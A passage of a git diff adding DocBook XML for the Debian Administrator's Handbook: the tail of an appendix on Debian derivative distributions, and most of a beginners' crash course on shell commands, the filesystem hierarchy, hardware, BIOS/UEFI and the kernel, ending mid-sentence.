+
+    <para>Grml is a LiveCD with many tools for system administrators, dealing
+    with installation, deployment, and system rescue. The LiveCD is provided
+    in two flavors, <literal>full</literal> and <literal>small</literal>, both
+    available for 32-bit and 64-bit PCs. Obviously, the two flavors differ
+    by the amount of software included and by the resulting size.
+    <ulink type="block" url="https://grml.org" /></para>
+  </section>
+
+  <section id="sect.tails">
+    <title>Tails</title>
+    <indexterm><primary>Tails</primary></indexterm>
+
+    <para>Tails (The Amnesic Incognito Live System) aims at providing
+    a live system that preserves anonymity and privacy.  It takes
+    great care in not leaving any trace on the computer it runs on,
+    and uses the Tor network to connect to the Internet in the most
+    anonymous way possible.  <ulink type="block" url="https://tails.boum.org" /></para>
+  </section>
+
+  <section id="sect.kali">
+    <title>Kali Linux</title>
+    <indexterm><primary>Kali</primary></indexterm>
+    <indexterm><primary>penetration testing</primary></indexterm>
+    <indexterm><primary>forensics</primary></indexterm>
+
+    <para>Kali Linux is a Debian-based distribution specialising in
+    penetration testing (“pentesting” for short).  It provides
+    software that helps auditing the security of an existing network
+    or computer while it is live, and analyze it after an attack
+    (which is known as “computer forensics”). <ulink type="block" url="https://kali.org" /></para>
+  </section>
+
+  <section id="sect.devuan">
+    <title>Devuan</title>
+    <indexterm><primary>Devuan</primary></indexterm>
+
+    <para>Devuan is a relatively new fork of Debian: it started in
+    2014 as a reaction to the decision made by Debian to switch to
+    <command>systemd</command> as the default init system.  A group of
+    users attached to <command>sysv</command> and opposing (real or
+    perceived) drawbacks to <command>systemd</command> started Devuan
+    with the objective of maintaining a
+    <command>systemd</command>-less system.  As of March 2015, they
+    haven't published any real release: it remains to be seen if the
+    project will succeed and find its niche, or if the systemd
+    opponents will learn to accept it.
+    <ulink type="block" url="https://devuan.org" /></para>
+  </section>
+
+  <section id="sect.tanglu">
+    <title>Tanglu</title>
+    <indexterm><primary>Tanglu</primary></indexterm>
+
+    <para>Tanglu is another Debian derivative; this one is based on a
+    mix of Debian <emphasis role="distribution">Testing</emphasis> and
+    <emphasis role="distribution">Unstable</emphasis>, with patches to
+    some packages. Its goal is to provide a modern desktop-friendly
+    distribution based on fresh software, without the release
+    constraints of Debian.  <ulink type="block" url="http://tanglu.org" /></para>
+  </section>
+
+  <section id="sect.doudoulinux">
+    <title>DoudouLinux</title>
+    <indexterm><primary>DoudouLinux</primary></indexterm>
+
+    <para>DoudouLinux targets young children (starting from 2 years old).
+    To achieve this goal, it provides an heavily customized graphical
+    interface (based on LXDE) and comes with many games and educative
+    applications.  Internet access is filtered to prevent children from
+    visiting problematic websites. Advertisements are blocked. The goal is
+    that parents should be free to let their children use their computer
+    once booted into DoudouLinux. And children should love using
+    DoudouLinux, just like they enjoy their gaming console.
+    <ulink type="block" url="http://www.doudoulinux.org" /></para>
+  </section>
+
+  <section id="sect.raspbian">
+    <title>Raspbian</title>
+    <indexterm><primary>Raspbian</primary></indexterm>
+    <indexterm><primary>Raspberry Pi</primary></indexterm>
+
+    <para>Raspbian is a rebuild of Debian optimised for the popular
+    (and inexpensive) Raspberry Pi family of single-board computers.
+    The hardware for that platform is more powerful than what the
+    Debian <emphasis role="architecture">armel</emphasis> architecture
+    can take advantage of, but lacks some features that would be
+    required for <emphasis role="architecture">armhf</emphasis>; so
+    Raspbian is a kind of intermediary, rebuilt specifically for that
+    hardware and including patches targeting this computer only.
+    <ulink type="block" url="https://raspbian.org" /></para>
+  </section>
+
+  <section id="sect.other-derivatives">
+    <title>And Many More</title>
+    <indexterm><primary>Distrowatch</primary></indexterm>
+
+    <para>The Distrowatch website references a huge number of Linux
+    distributions, many of which are based on Debian. Browsing this site is
+    a great way to get a sense of the diversity in the Free Software world.
+    <ulink type="block" url="http://distrowatch.com" /></para>
+
+    <para>The search form can help track down a distribution based on its
+    ancestry. In March 2015, selecting Debian led to 131 active
+    distributions! <ulink type="block" url="http://distrowatch.com/search.php" /></para>
+  </section>
+</appendix>
diff --git a/tmp/cs-CZ/xml_tmp/92_short-remedial-course.xml b/tmp/cs-CZ/xml_tmp/92_short-remedial-course.xml
new file mode 100644
index 000000000..b08c1f6b6
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/92_short-remedial-course.xml
@@ -0,0 +1,998 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE appendix PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<appendix id="short-remedial-course">
+  <appendixinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-short-remedial-course.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>BIOS</keyword>
+      <keyword>Kernel</keyword>
+      <keyword>Unix</keyword>
+      <keyword>Process</keyword>
+      <keyword>Hierarchy</keyword>
+      <keyword>Basic Commands</keyword>
+    </keywordset>
+  </appendixinfo>
+  <title>Short Remedial Course</title>
+  <highlights>
+    <para>Even though this book primarily targets administrators and
+    “power-users”, we wouldn't like to exclude motivated beginners.
+    This appendix will therefore be a crash-course describing the
+    fundamental concepts involved in handling a Unix computer.</para>
+  </highlights>
+  <section id="sect.shell-and-basic-commands">
+    <title>Shell and Basic Commands</title>
+
+    <para>In the Unix world, every administrator has to use the command
+    line sooner or later; for example, when the system fails to start
+    properly and only provides a command-line rescue mode. Being able to
+    handle such an interface, therefore, is a basic survival skill for
+    these circumstances.</para>
+
+    <sidebar>
+      <title><emphasis>QUICK LOOK</emphasis> Starting the command interpreter</title>
+
+      <para>A command-line environment can be run from the graphical
+      desktop, by an application known as a “terminal”. In GNOME,
+      you can start it from the “Activities” overview (that you get
+      when you move the mouse in the top-left corner of the screen) by
+      typing the first letters of the application name. In Plasma, you will
+      find it in the <menuchoice><guimenu>K</guimenu>
+      <guisubmenu>Applications</guisubmenu>
+      <guisubmenu>System</guisubmenu></menuchoice> menu.</para>
+    </sidebar>
+
+    <para>This section only gives a quick peek at the commands. They all
+    have many options not described here, so please refer to the
+    abundant documentation in their respective manual pages.</para>
+    <section>
+      <title>Browsing the Directory Tree and Managing Files</title>
+
+      <para>Once a session is open, the <command>pwd</command> command
+      (which stands for <emphasis>print working directory</emphasis>)
+      displays the current location in the filesystem. The current
+      directory is changed with the <command>cd
+      <replaceable>directory</replaceable></command> command
+      (<command>cd</command> is for <emphasis>change
+      directory</emphasis>).  The parent directory is always called
+      <literal>..</literal> (two dots), whereas the current directory
+      is also known as <literal>.</literal> (one dot). The
+      <command>ls</command> command allows
+      <emphasis>listing</emphasis> the contents of a directory. If no
+      parameters are given, it operates on the current
+      directory.</para>
+
+      <screen>
+<computeroutput>$ </computeroutput><userinput>pwd</userinput>
+<computeroutput>/home/rhertzog
+$ </computeroutput><userinput>cd Desktop</userinput>
+<computeroutput>$ </computeroutput><userinput>pwd</userinput>
+<computeroutput>/home/rhertzog/Desktop
+$ </computeroutput><userinput>cd .</userinput>
+<computeroutput>$ </computeroutput><userinput>pwd</userinput>
+<computeroutput>/home/rhertzog/Desktop
+$ </computeroutput><userinput>cd ..</userinput>
+<computeroutput>$ </computeroutput><userinput>pwd</userinput>
+<computeroutput>/home/rhertzog
+$ </computeroutput><userinput>ls</userinput>
+<computeroutput>Desktop    Downloads  Pictures  Templates
+Documents  Music      Public    Videos</computeroutput>
+      </screen>
+
+      <para>A new directory can be created with <command>mkdir
+      <replaceable>directory</replaceable></command>, and an existing
+      (empty) directory can be removed with <command>rmdir
+      <replaceable>directory</replaceable></command>. The
+      <command>mv</command> command allows <emphasis>moving</emphasis>
+      and/or renaming files and directories; <emphasis>removing</emphasis>
+      a file is achieved with <command>rm
+      <replaceable>file</replaceable></command>.</para>
+
+      <screen>
+<computeroutput>$ </computeroutput><userinput>mkdir test</userinput>
+<computeroutput>$ </computeroutput><userinput>ls</userinput>
+<computeroutput>Desktop    Downloads  Pictures  Templates  Videos
+Documents  Music      Public    test
+$ </computeroutput><userinput>mv test new</userinput>
+<computeroutput>$ </computeroutput><userinput>ls</userinput>
+<computeroutput>Desktop    Downloads  new       Public     Videos
+Documents  Music      Pictures  Templates
+$ </computeroutput><userinput>rmdir new</userinput>
+<computeroutput>$ </computeroutput><userinput>ls</userinput>
+<computeroutput>Desktop    Downloads  Pictures  Templates  Videos
+Documents  Music      Public</computeroutput>
+      </screen>
+    </section>
+    <section>
+      <title>Displaying and Modifying Text Files</title>
+
+      <para>The <command>cat <replaceable>file</replaceable></command>
+      command (intended to <emphasis>concatenate</emphasis> files to the
+      standard output device) reads a file and displays its contents on the
+      terminal. If the file is too big to fit on a screen, use a pager such
+      as <command>less</command> (or <command>more</command>) to display it
+      page by page.</para>
+
+      <para>The <command>editor</command> command starts a text
+      editor (such as <command>vi</command> or <command>nano</command>) and
+      allows creating, modifying and reading text files. The simplest files
+      can sometimes be created directly from the command interpreter thanks
+      to redirection: <command>echo "<replaceable>text</replaceable>"
+      &gt;<replaceable>file</replaceable></command> creates a file named
+      <replaceable>file</replaceable> with
+      “<replaceable>text</replaceable>” as its contents. Adding a line
+      at the end of this file is possible too, with a command such as
+      <command>echo "<replaceable>moretext</replaceable>"
+      &gt;&gt;<replaceable>file</replaceable></command>. Note the
+      <literal>&gt;&gt;</literal> in this example.</para>
+    </section>
+    <section>
+      <title>Searching for Files and within Files</title>
+
+      <para>The <command>find <replaceable>directory</replaceable>
+      <replaceable>criteria</replaceable></command> command looks for files
+      in the hierarchy under <replaceable>directory</replaceable> according
+      to several criteria. The most commonly used criterion is
+      <literal>-name <replaceable>name</replaceable></literal>: that allows
+      looking for a file by its name.</para>
+
+      <para>The <command>grep <replaceable>expression</replaceable>
+      <replaceable>files</replaceable></command> command searches the
+      contents of the files and extracts the lines matching the regular
+      expression (see sidebar <xref linkend="sidebar.regexp" />). Adding the
+      <literal>-r</literal> option enables a recursive search on all files
+      contained in the directory passed as a parameter. This allows looking
+      for a file when only a part of the contents are known.</para>
+    </section>
+    <section>
+      <title>Managing Processes</title>
+
+      <para>The <command>ps aux</command> command lists the processes
+      currently running and helps identifying them by showing their
+      <emphasis>pid</emphasis> (process id). Once the
+      <emphasis>pid</emphasis> of a process is known, the <command>kill
+      -<replaceable>signal</replaceable>
+      <replaceable>pid</replaceable></command> command allows sending it a
+      signal (if the process belongs to the current user). Several signals
+      exist; most commonly used are <literal>TERM</literal> (a request to
+      terminate gracefully) and <literal>KILL</literal> (a forced kill).</para>
+
+      <para>The command interpreter can also run programs in the background
+      if the command is followed by a “&amp;”. By using the ampersand, the
+      user resumes control of the shell immediately even though the command
+      is still running (hidden from the user; as a background process). The
+      <command>jobs</command> command lists the processes running in the
+      background; running <command>fg
+      %<replaceable>job-number</replaceable></command> (for
+      <emphasis>foreground</emphasis>) restores a job to the foreground.
+      When a command is running in the foreground (either because it was
+      started normally, or brought back to the foreground with
+      <command>fg</command>), the <keycombo action="simul"><keycap>Control</keycap><keycap>Z</keycap></keycombo>
+      key combination pauses the process and resumes control of the command-line.
+      The process can then be restarted in the background with <command>bg
+      %<replaceable>job-number</replaceable></command> (for
+      <foreignphrase>background</foreignphrase>).</para>
+    </section>
+    <section>
+      <title>System Information: Memory, Disk Space, Identity</title>
+
+      <para>The <command>free</command> command displays information on
+      memory; <command>df</command> (<emphasis>disk free</emphasis>)
+      reports on the available disk space on each of the disks mounted in
+      the filesystem. Its <literal>-h</literal> option (for <emphasis>human
+      readable</emphasis>) converts the sizes into a more legible unit
+      (usually mebibytes or gibibytes). In a similar fashion, the
+      <command>free</command> command supports the <literal>-m</literal>
+      and <literal>-g</literal> options, and displays its data either in
+      mebibytes or in gibibytes, respectively.</para>
+
+      <screen>
+<computeroutput>$ </computeroutput><userinput>free</userinput>
+<computeroutput>             total       used       free     shared    buffers     cached
+Mem:       1028420    1009624      18796          0      47404     391804
+-/+ buffers/cache:     570416     458004
+Swap:      2771172     404588    2366584
+$ </computeroutput><userinput>df</userinput>
+<computeroutput>Filesystem           1K-blocks      Used Available Use% Mounted on
+/dev/sda2              9614084   4737916   4387796  52% /
+tmpfs                   514208         0    514208   0% /lib/init/rw
+udev                     10240       100     10140   1% /dev
+tmpfs                   514208    269136    245072  53% /dev/shm
+/dev/sda5             44552904  36315896   7784380  83% /home
+</computeroutput></screen>
+
+      <para>The <command>id</command> command displays the identity of the
+      user running the session, along with the list of groups they belong
+      to. Since access to some files or devices may be limited to group
+      members, checking available group membership may be useful.</para>
+
+      <screen>
+<computeroutput>$ </computeroutput><userinput>id</userinput>
+<computeroutput>uid=1000(rhertzog) gid=1000(rhertzog) groups=1000(rhertzog),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),109(bluetooth),115(scanner)</computeroutput>
+      </screen>
+    </section>
+  </section>
+  <section id="sect.filesystem-hierarchy">
+    <title>Organization of the Filesystem Hierarchy</title>
+    <indexterm><primary>Filesystem Hierarchy</primary></indexterm>
+    <section>
+      <title>The Root Directory</title>
+
+      <para>A Debian system is organized along the <emphasis>Filesystem Hierarchy
+      Standard</emphasis> (FHS). This standard defines the purpose of each
+      directory. For instance, the top-level directories are described as
+      follows:</para>
+      <itemizedlist>
+        <listitem>
+	  <para><filename>/bin/</filename>: basic programs;</para>
+        </listitem>
+        <listitem>
+	  <para><filename>/boot/</filename>: Linux kernel and other files
+	  required for its early boot process;</para>
+        </listitem>
+        <listitem>
+	  <para><filename>/dev/</filename>: device files;</para>
+        </listitem>
+        <listitem>
+	  <para><filename>/etc/</filename>: configuration files;</para>
+        </listitem>
+        <listitem>
+	  <para><filename>/home/</filename>: user's personal files;</para>
+        </listitem>
+        <listitem>
+	  <para><filename>/lib/</filename>: basic libraries;</para>
+        </listitem>
+        <listitem>
+	  <para><filename>/media/*</filename>: mount points for removable
+	  devices (CD-ROM, USB keys and so on);</para>
+        </listitem>
+        <listitem>
+	  <para><filename>/mnt/</filename>: temporary mount point;</para>
+        </listitem>
+        <listitem>
+	  <para><filename>/opt/</filename>: extra applications provided by
+	  third parties;</para>
+        </listitem>
+        <listitem>
+	  <para><filename>/root/</filename>: administrator's (root's)
+	  personal files;</para>
+        </listitem>
+        <listitem>
+          <para><filename>/run/</filename>: volatile runtime data that does not
+          persist across reboots (not yet included in the FHS);
+          </para>
+        </listitem>
+        <listitem>
+	  <para><filename>/sbin/</filename>: system programs;</para>
+        </listitem>
+        <listitem>
+	  <para><filename>/srv/</filename>: data used by servers hosted on
+	  this system;</para>
+        </listitem>
+        <listitem>
+	  <para><filename>/tmp/</filename>: temporary files; this directory
+	  is often emptied at boot;</para>
+        </listitem>
+        <listitem>
+	  <para><filename>/usr/</filename>: applications; this directory is
+	  further subdivided into <filename>bin</filename>,
+	  <filename>sbin</filename>, <filename>lib</filename> (according to
+	  the same logic as in the root directory). Furthermore,
+	  <filename>/usr/share/</filename> contains
+	  architecture-independent data. <filename>/usr/local/</filename>
+	  is meant to be used by the administrator for installing
+	  applications manually without overwriting files handled by the
+	  packaging system (<command>dpkg</command>).</para>
+        </listitem>
+        <listitem>
+	  <para><filename>/var/</filename>: variable data handled by
+	  daemons. This includes log files, queues, spools, caches and so
+	  on.</para>
+        </listitem>
+        <listitem>
+	  <para><filename>/proc/</filename> and <filename>/sys/</filename>
+	  are specific to the Linux kernel (and not part of the FHS). They
+	  are used by the kernel for exporting data to user space
+	  (see <xref linkend="sect.userspace-presentation" /> and <xref linkend="sect.user-space" /> for explanations about this
+	  concept).</para>
+        </listitem>
+      </itemizedlist>
+    </section>
+    <section>
+      <title>The User's Home Directory</title>
+
+      <para>The contents of a user's home directory is not standardized,
+      but there are still a few noteworthy conventions. One is that a
+      user's home directory is often referred to by a tilde (“~”). That
+      is useful to know because command interpreters automatically replace
+      a tilde with the correct directory (usually
+      <filename>/home/<replaceable>user</replaceable>/</filename>).</para>
+
+      <para>Traditionally, application configuration files are often
+      stored directly under the user's home directory, but their names
+      usually start with a dot (for instance, the
+      <command>mutt</command> email client stores its configuration in
+      <filename>~/.muttrc</filename>). Note
+      that filenames that start with a dot are hidden by default; and
+      <command>ls</command> only lists them when the
+      <literal>-a</literal> option is used, and graphical file
+      managers need to be told to display hidden files.</para>
+
+      <para>Some programs also use multiple configuration files
+      organized in one directory (for instance,
+      <filename>~/.ssh/</filename>). Some applications (such as the
+      Iceweasel web browser) also use their directory to store a cache
+      of downloaded data. This means that those directories can end up
+      using a lot of disk space.</para>
+
+      <para>These configuration files stored directly in a user's home
+      directory, often collectively referred to as
+      <emphasis>dotfiles</emphasis>, have long proliferated to the
+      point that these directories can be quite cluttered with them.
+      Fortunately, an effort led collectively under the
+      FreeDesktop.org umbrella has resulted in the “XDG Base Directory
+      Specification”, a convention that aims at cleaning up these
+      files and directory.  This specification states that
+      configuration files should be stored under
+      <filename>~/.config</filename>, cache files under
+      <filename>~/.cache</filename>, and application data files under
+      <filename>~/.local</filename> (or subdirectories thereof).  This
+      convention is slowly gaining traction, and several applications
+      (especially graphical ones) have started following it.</para>
+
+      <para>Graphical desktops usually display the contents of the
+      <filename>~/Desktop/</filename> directory (or whatever the appropriate
+      translation is for systems not configured in English) on the desktop
+      (ie, what is visible on screen once all applications are closed or
+      iconized).</para>
+
+      <para>Finally, the email system sometimes stores incoming emails into
+      a <filename>~/Mail/</filename> directory.</para>
+    </section>
+  </section>
+  <section id="sect.computer-layers">
+    <title>Inner Workings of a Computer: the Different Layers Involved</title>
+
+    <para>A computer is often considered as something rather abstract, and
+    the externally visible interface is much simpler than its internal
+    complexity. Such complexity comes in part from the number of pieces
+    involved. However, these pieces can be viewed in layers, where a layer
+    only interacts with those immediately above or below.</para>
+
+    <para>An end-user can get by without knowing these details… as long
+    as everything works. When confronting a problem such as, “The
+    internet doesn't work!”, the first thing to do is to identify in
+    which layer the problem originates. Is the network card (hardware)
+    working? Is it recognized by the computer? Does the Linux kernel see
+    it? Are the network parameters properly configured? All these questions
+    isolate an appropriate layer and focus on a potential source of the
+    problem.</para>
+    <section id="sect.hardware">
+      <title>The Deepest Layer: the Hardware</title>
+      <indexterm><primary>IDE</primary></indexterm>
+      <indexterm><primary>SCSI</primary></indexterm>
+      <indexterm><primary>Serial ATA</primary></indexterm>
+      <indexterm><primary>Parallel ATA</primary></indexterm>
+      <indexterm><primary>ATA</primary></indexterm>
+      <indexterm><primary>IEEE 1394</primary></indexterm>
+      <indexterm><primary>Firewire</primary></indexterm>
+      <indexterm><primary>USB</primary></indexterm>
+
+      <para>Let us start with a basic reminder that a computer is,
+      first and foremost, a set of hardware elements. There is
+      generally a main board (known as the
+      <emphasis>motherboard</emphasis>), with one (or more)
+      processor(s), some RAM, device controllers, and extension slots
+      for option boards (for other device controllers).  Most
+      noteworthy among these controllers are IDE (Parallel ATA), SCSI
+      and Serial ATA, for connecting to storage devices such as hard
+      disks.  Other controllers include USB, which is able to host a
+      great variety of devices (ranging from webcams to thermometers,
+      from keyboards to home automation systems) and IEEE 1394
+      (Firewire). These controllers often allow connecting several
+      devices so the complete subsystem handled by a controller is
+      therefore usually known as a “bus”.  Option boards include
+      graphics cards (into which monitor screens will be plugged),
+      sound cards, network interface cards, and so on. Some main
+      boards are pre-built with these features, and don't need option
+      boards.</para>
+
+      <sidebar>
+        <title><emphasis>IN PRACTICE</emphasis> Checking that the hardware works</title>
+
+	<para>Checking that a piece of hardware works can be tricky. On the
+	other hand, proving that it doesn't work is sometimes quite
+	simple.</para>
+
+	<para>A hard disk drive is made of spinning platters and moving
+	magnetic heads. When a hard disk is powered up, the platter motor
+	makes a characteristic whir. It also dissipates energy as heat.
+	Consequently, a hard disk drive that stays cold and silent when
+	powered up is broken.</para>
+
+	<para>Network cards often include LEDs displaying the state of the
+	link. If a cable is plugged in and leads to a working network hub
+	or switch, at least one LED will be on. If no LED lights up, either
+	the card itself, the network device, or the cable between them, is
+	faulty. The next step is therefore testing each component
+	individually.</para>
+
+	<para>Some option boards — especially 3D video cards — include
+	cooling devices, such as heat sinks and/or fans. If the fan does
+	not spin even though the card is powered up, a plausible
+	explanation is the card overheated. This also applies to the main
+	processor(s) located on the main board.</para>
+      </sidebar>
+    </section>
+    <section id="sect.bios">
+      <title>The Starter: the BIOS or UEFI</title>
+      <indexterm><primary>BIOS</primary></indexterm>
+      <indexterm><primary>UEFI</primary></indexterm>
+      <indexterm><primary>Master Boot Record (MBR)</primary></indexterm>
+
+      <para>Hardware, on its own, is unable to perform useful tasks without
+      a corresponding piece of software driving it. Controlling and
+      interacting with the hardware is the purpose of the operating system
+      and applications. These, in turn, require functional hardware to
+      run.</para>
+
+      <para>This symbiosis between hardware and software does not happen on
+      its own. When the computer is first powered up, some initial setup is
+      required. This role is assumed by the BIOS or UEFI, a piece of software
+      embedded into the main board that runs automatically upon power-up.
+      Its primary task is searching for software it can hand over control
+      to. Usually, in the BIOS case, this involves looking for the first
+      hard disk with a boot sector (also known as the <emphasis>master
+      boot record</emphasis> or <acronym>MBR</acronym>), loading that
+      boot sector, and running it. From then on, the BIOS is usually not
+      involved (until the next boot). In the case of UEFI, the process
+      involves scanning disks to find a dedicated EFI partition containing
+      further EFI applications to execute.</para>
+
+      <sidebar>
+        <title><emphasis>TOOL</emphasis> Setup, the BIOS/UEFI configuration tool</title>
+        <indexterm><primary><emphasis>Setup</emphasis></primary></indexterm>
+
+	<para>The BIOS/UEFI also contains a piece of software called Setup,
+	designed to allow configuring aspects of the computer. In
+	particular, it allows choosing which boot device is preferred (for
+	instance, the floppy disk or CD-ROM drive), setting the system
+	clock, and so on. Starting Setup usually involves pressing a key
+	very soon after the computer is powered on. This key is often
+	<keycap>Del</keycap> or <keycap>Esc</keycap>, sometimes
+	<keycap>F2</keycap> or <keycap>F10</keycap>. Most of the time, the
+	choice is flashed on screen while booting.</para>
+      </sidebar>
+
+      <para>The boot sector (or the EFI partition), in turn, contains another piece of
+      software, called the bootloader, whose purpose is to find and run an
+      operating system. Since this bootloader is not embedded in the main
+      board but loaded from disk, it can be smarter than the BIOS, which
+      explains why the BIOS does not load the operating system by itself.
+      For instance, the bootloader (often GRUB on Linux systems) can list
+      the available operating systems and ask the user to choose one.
+      Usually, a time-out and default choice is provided. Sometimes the
+      user can also choose to add parameters to pass to the kernel, and so
+      on. Eventually, a kernel is found, loaded into memory, and
+      executed.</para>
+
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> UEFI, a modern replacement to the BIOS</title>
+        <indexterm><primary>UEFI</primary></indexterm>
+        <indexterm><primary>Secure Boot</primary></indexterm>
+
+        <para>UEFI is a relatively recent development. Most new computers will
+        support UEFI booting, but usually they also support BIOS booting alongside
+        for backwards compatibility with operating systems that are not ready
+        to exploit UEFI.
+        </para>
+        <para>This new system gets rid of some of the limitations of BIOS
+        booting: with the usage of a dedicated partition, the bootloaders no longer
+        need special tricks to fit in a tiny <emphasis>master boot record</emphasis>
+        and then discover the kernel to boot. Even better, with a suitably
+        built Linux kernel, UEFI can directly boot the kernel without any
+        intermediary bootloader.  UEFI is also the basic foundation used
+        to deliver <emphasis>Secure Boot</emphasis>, a technology ensuring
+        that you run only software validated by your operating system
+        vendor.
+        </para>
+      </sidebar>
+
+      <para>The BIOS/UEFI is also in charge of detecting and initializing a
+      number of devices. Obviously, this includes the IDE/SATA devices
+      (usually hard disk(s) and CD/DVD-ROM drives), but also PCI devices.
+      Detected devices are often listed on screen during the boot process.
+      If this list goes by too fast, use the <keycap>Pause</keycap> key to
+      freeze it for long enough to read. Installed PCI devices that don't
+      appear are a bad omen. At worst, the device is faulty. At best, it
+      is merely incompatible with the current version of the BIOS or main
+      board. PCI specifications evolve, and old main boards are not
+      guaranteed to handle newer PCI devices.</para>
+    </section>
+    <section id="sect.kernel">
+      <title>The Kernel</title>
+
+      <para>Both the BIOS/UEFI and the bootloader only run for a few seconds
+      each; now we are getting to the first piece of software that runs for
+      a longer time, the operating system kernel. This kernel assumes the
+      role of a conductor in an orchestra, and ensures coordination between
+      hardware and software. This role involves several tasks including:
+      driving hardware, managing processes, users and permissions, the
+      filesystem, and so on. The kernel provides a common base to all other
+      programs on the system.</para>
+    </section>
+    <section id="sect.userspace-presentation">
+      <title>The User Space</title>
+
+      <para>Although everything that happens outside of the kernel can be
+      lumped together under “user space”, we can still separate it into
+      software layers. However, their interactions are more complex than
+      before, and the classifications may not be as simple. An application
+      commonly uses libraries, which in turn involve the kernel, but the
+      communications can also involve other programs, or even many
+      libraries calling each other.</para>
+    </section>
+  </section>
+  <section id="sect.kernel-role-and-tasks">
+    <title>Some Tasks Handled by the Kernel</title>
+    <section id="sect.hardware-drivers">
+      <title>Driving the Hardware</title>
+
+      <para>The kernel is, first and foremost, tasked with controlling the
+      hardware parts, detecting them, switching them on when the computer
+      is powered on, and so on. It also makes them available to
+      higher-level software with a simplified programming interface, so
+      applications can take advantage of devices without having to worry
+      about details such as which extension slot the option board is
+      plugged into. The programming interface also provides an abstraction
+      layer; this allows video-conferencing software, for example, to use a
+      webcam independently of its make and model. The software can just use
+      the <emphasis>Video for Linux</emphasis> (V4L) interface, and the
+      kernel translates the function calls of this interface into the
+      actual hardware commands needed by the specific webcam in use.</para>
+
+     
+      <para><indexterm><primary><command>lspci</command></primary></indexterm>
+      <indexterm><primary><command>lsusb</command></primary></indexterm>
+      <indexterm><primary><command>lsdev</command></primary></indexterm>
+      <indexterm><primary><command>lspcmcia</command></primary></indexterm>
+      The kernel exports many details about detected hardware through the
+      <filename>/proc/</filename> and <filename>/sys/</filename> virtual
+      filesystems. Several tools summarize those details. Among them,
+      <command>lspci</command> (in the <emphasis role="pkg">pciutils</emphasis> package) lists PCI devices,
+      <command>lsusb</command> (in the <emphasis role="pkg">usbutils</emphasis> package) lists USB devices, and
+      <command>lspcmcia</command> (in the <emphasis role="pkg">pcmciautils</emphasis> package) lists PCMCIA cards. These
+      tools are very useful for identifying the exact model of a device.
+      This identification also allows more precise searches on the web,
+      which in turn, lead to more relevant documents.</para>
+
+      <example>
+        <title>Example of information provided by <command>lspci</command> and <command>lsusb</command></title>
+
+        <screen>
+<computeroutput>$ </computeroutput><userinput>lspci</userinput>
+<computeroutput>[...]
+00:02.1 Display controller: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 03)
+00:1c.0 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 1 (rev 03)
+00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 03)
+[...]
+01:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5751 Gigabit Ethernet PCI Express (rev 01)
+02:03.0 Network controller: Intel Corporation PRO/Wireless 2200BG Network Connection (rev 05)
+$ </computeroutput><userinput>lsusb</userinput>
+<computeroutput>Bus 005 Device 004: ID 413c:a005 Dell Computer Corp.
+Bus 005 Device 008: ID 413c:9001 Dell Computer Corp.
+Bus 005 Device 007: ID 045e:00dd Microsoft Corp.
+Bus 005 Device 006: ID 046d:c03d Logitech, Inc.
+[...]
+Bus 002 Device 004: ID 413c:8103 Dell Computer Corp. Wireless 350 Bluetooth
+</computeroutput></screen>
+      </example>
+
+      <para>These programs have a <literal>-v</literal> option, that lists
+      much more detailed (but usually not necessary) information. Finally,
+      the <command>lsdev</command> command (in the <emphasis role="pkg">procinfo</emphasis> package) lists communication resources
+      used by devices.</para>
+
+      <para>Applications often access devices by way of special files
+      created within <filename>/dev/</filename> (see sidebar <xref linkend="sidebar.special-files" />). These are special files that
+      represent disk drives (for instance, <filename>/dev/hda</filename>
+      and <filename>/dev/sdc</filename>), partitions
+      (<filename>/dev/hda1</filename> or <filename>/dev/sdc3</filename>),
+      mice (<filename>/dev/input/mouse0</filename>), keyboards
+      (<filename>/dev/input/event0</filename>), soundcards
+      (<filename>/dev/snd/*</filename>), serial ports
+      (<filename>/dev/ttyS*</filename>), and so on.</para>
+    </section>
+    <section id="sect.filesystems">
+      <title>Filesystems</title>
+      <indexterm><primary>filesystem</primary></indexterm>
+      <indexterm><primary>system, filesystem</primary></indexterm>
+
+      <para>Filesystems are one of the most prominent aspects of the
+      kernel. Unix systems merge all the file stores into a single
+      hierarchy, which allows users (and applications) to access data
+      simply by knowing its location within that hierarchy.</para>
+
+      <para>The starting point of this hierarchical tree is called the
+      root, <filename>/</filename>. This directory can contain named
+      subdirectories. For instance, the <literal>home</literal>
+      subdirectory of <filename>/</filename> is called
+      <filename>/home/</filename>. This subdirectory can, in turn, contain
+      other subdirectories, and so on. Each directory can also contain
+      files, where the actual data will be stored. Thus, the
+      <filename>/home/rmas/Desktop/hello.txt</filename> name refers to a
+      file named <literal>hello.txt</literal> stored in the
+      <literal>Desktop</literal> subdirectory of the
+      <literal>rmas</literal> subdirectory of the <literal>home</literal>
+      directory present in the root. The kernel translates between this
+      naming system and the actual, physical storage on a disk.</para>
+
+      <para>Unlike other systems, there is only one such hierarchy, and it
+      can integrate data from several disks. One of these disks is used as
+      the root, and the others are “mounted” on directories in the
+      hierarchy (the Unix command is called <command>mount</command>);
+      these other disks are then available under these “mount points”.
+      This allows storing users' home directories (traditionally stored
+      within <filename>/home/</filename>) on a second hard disk, which will
+      contain the <literal>rhertzog</literal> and <literal>rmas</literal>
+      directories. Once the disk is mounted on <filename>/home/</filename>,
+      these directories become accessible at their usual locations, and
+      paths such as <filename>/home/rmas/Desktop/hello.txt</filename> keep
+      working.</para>
+      <indexterm><primary><command>mkfs</command></primary></indexterm>
+
+      <para>There are many filesystem formats, corresponding to many ways of
+      physically storing data on disks. The most widely known are
+      <emphasis>ext2</emphasis>, <emphasis>ext3</emphasis> and
+      <emphasis>ext4</emphasis>, but others exist. For instance,
+      <emphasis>vfat</emphasis> is the system that was historically used by
+      DOS and Windows operating systems, which allows using hard disks
+      under Debian as well as under Windows. In any case, a filesystem must
